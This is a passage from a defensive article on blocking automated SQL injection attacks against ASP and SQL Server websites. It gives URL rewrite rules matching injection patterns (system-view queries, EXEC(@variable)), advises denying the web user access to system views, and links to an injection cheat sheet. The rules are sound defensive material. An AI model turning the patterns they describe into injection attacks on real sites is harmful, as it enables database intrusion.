RewriteRule /.*?\.asp\?.*?sys.?(?:objects|columns|tables).* /jobboard/error-pages/banned.asp [I,L,U]
RewriteRule /(?:.*?\.asp\?.*?);EXEC\(\@\w+\);?.* /jobboard/error-pages/banned.asp [I,L,U]



Block access to system views
.

A lot of the most current hacks make use of the system views that are available in SQL Server that list out all the tables, columns, data types and any other useful information that would be a goldmine to a hacker. Giving them access to these tables is like doing their work for them. They don't need to guess what names you have given the tables and columns in your database as they have access to a list of all of them and can easily create a statement to loop through those of interest to create havoc.

In the majority of cases your website would not need access to these views so blocking them would have no detremential affect however you should verify this first with developers and DBA's. I personally tend to use them in parts of the system where I allow certain admin users to upload data into the system. It enables me to output the correct format for the upload (data type, column size, allow nulls etc) without having to worry about changing code if a column gets modified. So there are perfectly valid reasons that your site may need access to these views however if your site doesn't then deny access to your website user as although it will not stop all SQL injection attacks it will stop the current crop of automated bots that make use of the system views to create the necessary UPDATE statements. So although not perfect if your system doesn't require access to them its another useful layer of protection to add.


Conclusion

SQL injection is on the rise due to automated bots which means any and all sites available on the internet could fall victim. New sites should be developed with this in mind and should be implemented with a multi layered approach to prevention. This should take the form of data validation, parameterized queries and stored procedures, least privllege access to users including denying access to system views, hiding error messages from users and the logging of hack attempts so that defenses can be kept up to date.

For a detailed look at SQL injection methods http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.

Article about preventing SQL injection attacks in ASP.NET http://msdn.microsoft.com/en-us/library/ms998271.aspx